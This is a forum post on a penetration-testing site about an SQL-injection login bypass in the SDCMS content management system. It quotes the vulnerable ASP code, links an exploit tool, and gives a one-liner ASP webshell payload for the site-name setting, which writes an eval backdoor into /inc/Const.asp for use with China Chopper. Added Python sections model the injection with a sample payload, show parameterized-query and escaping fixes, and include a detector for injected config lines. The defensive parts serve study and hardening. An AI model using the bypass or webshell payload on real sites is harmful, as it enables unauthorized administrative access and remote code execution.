中国网络渗透测试联盟
Title: SDCMS universal vulnerability exploit tool and privilege escalation to a SHELL
Posted by: admin
Time: 2012-11-9 20:57
Author: T00LS 鬼哥
Vulnerable file: <admin directory>/index.asp

    Sub Check
        Dim username,password,code,getcode,Rs
        ' Referer check: "submitting data from outside is forbidden"
        IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
        ' Mode 1 of FilterText strips whitespace only; quote characters survive (see FilterText below)
        username=FilterText(Trim(Request.Form("username")),1)
        password=FilterText(Trim(Request.Form("password")),1)
        code=Trim(Request.Form("yzm"))
        getcode=Session("SDCMSCode")
        ' "the system has disabled further logins for you today"
        IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
        ' Captcha checks: "captcha may not be empty", "captcha must be numeric", "captcha wrong"
        IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":died
        IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":died
        IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":died
        IF username="" or password="" Then
            ' "username or password may not be empty"
            Echo "用户名或密码不能为空":died
        Else
            ' username is concatenated straight into the WHERE clause; only the password is hashed
            Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
            IF Rs.Eof Then
                AddLog username,GetIp,"登录失败",1   ' "login failed"
                ' "wrong username or password, N attempts left today"
                Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
            Else
                ' Whatever row the query returned becomes the logged-in administrator
                Add_Cookies "sdcms_id",Rs(0)
                Add_Cookies "sdcms_name",username
                Add_Cookies "sdcms_pwd",Rs(2)
                Add_Cookies "sdcms_admin",Rs(3)
                Add_Cookies "sdcms_alllever",Rs(4)
                Add_Cookies "sdcms_infolever",Rs(5)
                Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
                AddLog username,GetIp,"登录成功",1   ' "login succeeded"
                ' Automatically delete log records older than 30 days (Access syntax vs. SQL Server syntax)
                IF Sdcms_DataType Then
                    Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
                Else
                    Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
                End IF
                Go("sdcms_index.asp")
            End IF
            Rs.Close
            Set Rs=Nothing
        End IF
    End Sub

We can see that username is filtered through FilterText. Let's look at the FilterText code:

    Function FilterText(ByVal t0,ByVal t1)
        IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
        t0=Trim(t0)
        Select Case t1
            Case "1"   ' whitespace only: space, carriage return, line feed
                t0=Replace(t0,Chr(32),"")
                t0=Replace(t0,Chr(13),"")
                t0=Replace(t0,Chr(10)&Chr(10),"")
                t0=Replace(t0,Chr(10),"")
            Case "2"   ' control characters plus ASCII punctuation
                t0=Replace(t0,Chr(8),"")      ' backspace
                t0=Replace(t0,Chr(9),"")      ' tab (horizontal)
                t0=Replace(t0,Chr(10),"")     ' line feed
                t0=Replace(t0,Chr(11),"")     ' tab (vertical)
                t0=Replace(t0,Chr(12),"")     ' form feed
                t0=Replace(t0,Chr(13),"")     ' carriage return (Chr(13)&Chr(10) is the CRLF pair)
                t0=Replace(t0,Chr(22),"")     ' SYN control character
                t0=Replace(t0,Chr(32),"")     ' space
                t0=Replace(t0,Chr(33),"")     ' !
                t0=Replace(t0,Chr(34),"")     ' "
                t0=Replace(t0,Chr(35),"")     ' #
                t0=Replace(t0,Chr(36),"")     ' $
                t0=Replace(t0,Chr(37),"")     ' %
                t0=Replace(t0,Chr(38),"")     ' &
                t0=Replace(t0,Chr(39),"")     ' '  (single quote; only removed in this mode)
                t0=Replace(t0,Chr(40),"")     ' (
                t0=Replace(t0,Chr(41),"")     ' )
                t0=Replace(t0,Chr(42),"")     ' *
                t0=Replace(t0,Chr(43),"")     ' +
                t0=Replace(t0,Chr(44),"")     ' ,
                t0=Replace(t0,Chr(45),"")     ' -
                t0=Replace(t0,Chr(46),"")     ' .
                t0=Replace(t0,Chr(47),"")     ' /
                t0=Replace(t0,Chr(58),"")     ' :
                t0=Replace(t0,Chr(59),"")     ' ;
                t0=Replace(t0,Chr(60),"")     ' <
                t0=Replace(t0,Chr(61),"")     ' =
                t0=Replace(t0,Chr(62),"")     ' >
                t0=Replace(t0,Chr(63),"")     ' ?
                t0=Replace(t0,Chr(64),"")     ' @
                t0=Replace(t0,Chr(91),"")     ' [
                t0=Replace(t0,Chr(92),"")     ' \
                t0=Replace(t0,Chr(93),"")     ' ]
                t0=Replace(t0,Chr(94),"")     ' ^
                t0=Replace(t0,Chr(95),"")     ' _
                t0=Replace(t0,Chr(96),"")     ' `
                t0=Replace(t0,Chr(123),"")    ' {
                t0=Replace(t0,Chr(124),"")    ' |
                t0=Replace(t0,Chr(125),"")    ' }
                t0=Replace(t0,Chr(126),"")    ' ~
            Case Else   ' HTML-encode for output (the forum rendering had decoded these entities back to the raw characters)
                t0=Replace(t0, "&", "&amp;")
                t0=Replace(t0, "'", "&#39;")
                t0=Replace(t0, """", "&quot;")
                t0=Replace(t0, "<", "&lt;")
                t0=Replace(t0, ">", "&gt;")
        End Select
        IF Instr(Lcase(t0),"expression")>0 Then
            ' insert a soft hyphen so CSS expression() cannot be spelled out
            t0=Replace(t0,"expression","e&#173;xpression", 1, -1, 0)
        End If
        FilterText=t0
    End Function

See that? With the second argument set to 1, FilterText only strips:

    t0=Replace(t0,Chr(32),"")
    t0=Replace(t0,Chr(13),"")
    t0=Replace(t0,Chr(10)&Chr(10),"")
    t0=Replace(t0,Chr(10),"")

That is, space, carriage return and line feed. The single quote (Chr(39)) is only removed in the Case "2" branch, so it passes unchanged into the Sdcms_name='...' comparison of the login query, and the login check can be bypassed by SQL injection. The vulnerability lets you get the backend account directly. SDCMS's default backend path is /admin/; if the webmaster changed the backend path, find it yourself!
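To make the point concrete, here is an added Python model of the login path (not SDCMS code and not from the original post). It ports the Case "1" and Case "2" branches of FilterText, builds the same concatenated query as Sub Check, and runs it against a constructed Sd_Admin table in an in-memory SQLite database standing in for Access/SQL Server. The payload is a constructed illustration of the injection class, not the one used by the tool, and a parameterized version of the same query is shown beside it as the fix.

```python
"""Python model of the SDCMS login path shown above (added example, not SDCMS
code).  filter_text() ports the Case "1" and Case "2" branches of FilterText;
the Sd_Admin table, its admin row and the payload are constructed test data
run against an in-memory SQLite database instead of Access/SQL Server."""
import hashlib
import sqlite3

# Chr() codes removed by FilterText(t0, 1): space, CR, LF.
MODE1_STRIP = {32, 13, 10}
# Chr() codes removed by FilterText(t0, 2), transcribed from the Case "2" branch:
# a few control characters plus every ASCII punctuation range. Letters and
# digits are never touched in either mode.
MODE2_STRIP = ({8, 9, 10, 11, 12, 13, 22} | set(range(32, 48))
               | set(range(58, 65)) | set(range(91, 97)) | set(range(123, 127)))


def filter_text(t0: str, t1: int) -> str:
    """FilterText for modes 1 and 2. VBScript Trim() only removes spaces."""
    if not t0:
        return ""
    t0 = t0.strip(" ")
    strip = MODE1_STRIP if t1 == 1 else MODE2_STRIP
    return "".join(ch for ch in t0 if ord(ch) not in strip)


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def vulnerable_login_sql(username: str, password: str) -> str:
    """The exact concatenation from Sub Check: username goes through mode 1
    (whitespace only), so a single quote reaches the SQL text unchanged."""
    u = filter_text(username, 1)
    p = filter_text(password, 1)
    return ("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin "
            f"Where Sdcms_name='{u}' And Sdcms_Pwd='{md5_hex(p)}'")


def make_db() -> sqlite3.Connection:
    """Constructed Sd_Admin table with one admin whose password the attacker
    does not know."""
    conn = sqlite3.connect(":memory:")
    conn.execute("Create Table Sd_Admin(Id Integer, Sdcms_Name Text, Sdcms_Pwd Text,"
                 " isadmin Integer, alllever Text, infolever Text)")
    conn.execute("Insert Into Sd_Admin Values(1,'admin',?,1,'','')",
                 (md5_hex("not-known-to-the-attacker"),))
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """Run the concatenated query; return the matched Sdcms_Name or None."""
    row = conn.execute(vulnerable_login_sql(username, password)).fetchone()
    return row[1] if row else None


def parameterized_login(conn: sqlite3.Connection, username: str, password: str):
    """Hardened form: the same query with bound parameters, so a quote in the
    username is data, not SQL. (Classic ASP would use ADODB.Command with
    Parameters; sqlite3 placeholders stand in for it here.)"""
    row = conn.execute(
        "Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin "
        "Where Sdcms_name=? And Sdcms_Pwd=?",
        (filter_text(username, 1), md5_hex(filter_text(password, 1))),
    ).fetchone()
    return row[1] if row else None


# Constructed payload illustrating the class. Mode 1 strips the spaces, which is
# harmless: SQL needs no space between a closing quote and the next keyword, so
# the WHERE clause becomes  Sdcms_name='admin'Or'1'='1' And Sdcms_Pwd='<hash>',
# i.e. name='admin' OR ('1'='1' AND pwd=...), which is true for the admin row.
PAYLOAD = "admin' Or '1'='1"

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_login_sql(PAYLOAD, "anything"))
    print("mode 1, concatenated :", vulnerable_login(db, PAYLOAD, "anything"))
    print("mode 2 would leave   :", filter_text(PAYLOAD, 2))
    print("parameterized        :", parameterized_login(db, PAYLOAD, "anything"))
```

Two things are worth noticing. Mode 1 removes spaces, so injected text has to be written without them, which the SQL parser does not mind between a quoted literal and a keyword. And while mode 2 would have stripped the quote, the actual fix is binding username as a parameter rather than filtering characters.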

EXP tool download (this tool only runs on XP): sdcms-EXP

Test:

Now enter the captcha into the tool and click OK.

See, we're straight into the admin management interface, heh!

Just like that, we're in the backend....

SDCMS privilege escalation:

Method 1: open /<admin directory>/sdcms_set.asp and append the following to the "Site name" field:

    ":eval(request(Chr(63)))'

That writes a one-liner straight into /inc/Const.asp: the leading " closes the string literal the site name is written into, : starts a new statement, and the trailing ' comments out the rest of the line. The one-liner's connection password is ? (Chr(63)).

OK, now connect with 菜刀 (China Chopper)!
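As an added example (not from the post and not SDCMS code), the following Python models what Method 1 does to the generated file and how to spot it afterwards. The post does not show how sdcms_set.asp writes the value into /inc/Const.asp, so the line shape Const Sdcms_WebName="..." is an assumption, and the sample file is constructed; the payload is the one from the post. It shows the naive write beside a writer that escapes quotes the VBScript way, plus a small tokenizer that reports code appearing outside string literals in a constants-only file.

```python
"""Model of the Method 1 write into /inc/Const.asp (added example, not SDCMS
code). The post does not show how sdcms_set.asp formats the line, so
Const Sdcms_WebName="..." is an assumed shape and SAMPLE_CONST_ASP is a
constructed file. PAYLOAD is the value from the post."""

PAYLOAD = "\":eval(request(Chr(63)))'"   # the value typed into the site-name field


def naive_write(site_name: str) -> str:
    """Assumed vulnerable writer: the value is dropped between the quotes as-is,
    so a " in it closes the literal and the remainder becomes VBScript code."""
    return f'Const Sdcms_WebName="{site_name}"'


def escaped_write(site_name: str) -> str:
    """Hardened writer: VBScript spells a literal double quote inside a string
    as two double quotes, so the value can never terminate the literal."""
    return 'Const Sdcms_WebName="' + site_name.replace('"', '""') + '"'


def code_outside_strings(line: str) -> str:
    """Return the executable part of one VBScript line: everything that is not
    inside a "..." literal (with "" as the escaped quote) and not in a trailing
    ' comment. Each literal is replaced by an empty "" placeholder."""
    out = []
    i, n = 0, len(line)
    while i < n:
        ch = line[i]
        if ch == '"':
            i += 1
            while i < n:
                if line[i] == '"':
                    if i + 1 < n and line[i + 1] == '"':   # "" inside a literal
                        i += 2
                        continue
                    break                                   # closing quote
                i += 1
            i += 1
            out.append('""')
        elif ch == "'":
            break                                           # comment to end of line
        else:
            out.append(ch)
            i += 1
    return "".join(out)


# Calls that have no business outside a string literal in a constants-only file.
SUSPECT_CALLS = ("eval(", "execute(", "executeglobal(", "request(")


def looks_injected(line: str) -> bool:
    """True if a suspect call appears in the code part of the line."""
    code = code_outside_strings(line).lower().replace(" ", "")
    return any(call in code for call in SUSPECT_CALLS)


def find_injected_lines(asp_source: str) -> list:
    """1-based line numbers of a Const.asp-style file that carry suspect code
    outside their string literals; a quick check for a backdoored config."""
    return [no for no, line in enumerate(asp_source.splitlines(), 1)
            if looks_injected(line)]


# Constructed Const.asp after the Method 1 write; line 3 carries the one-liner.
SAMPLE_CONST_ASP = "\n".join([
    "<%",
    'Const Sdcms_Version="1.0"',
    naive_write(PAYLOAD),
    'Const Sdcms_WebUrl="http://example.invalid/"',
    'Const Sdcms_Note="eval(request(""x"")) inside a string is harmless"',
    "%>",
])

if __name__ == "__main__":
    print(naive_write(PAYLOAD))
    print(escaped_write(PAYLOAD))
    print("injected lines:", find_injected_lines(SAMPLE_CONST_ASP))
```

Escaping the quote closes this particular hole, but the underlying design, writing user-controlled settings into an .asp file that the server then executes, is what turns a config change into code execution; storing settings as data (database row, INI, XML) removes the problem entirely.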
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2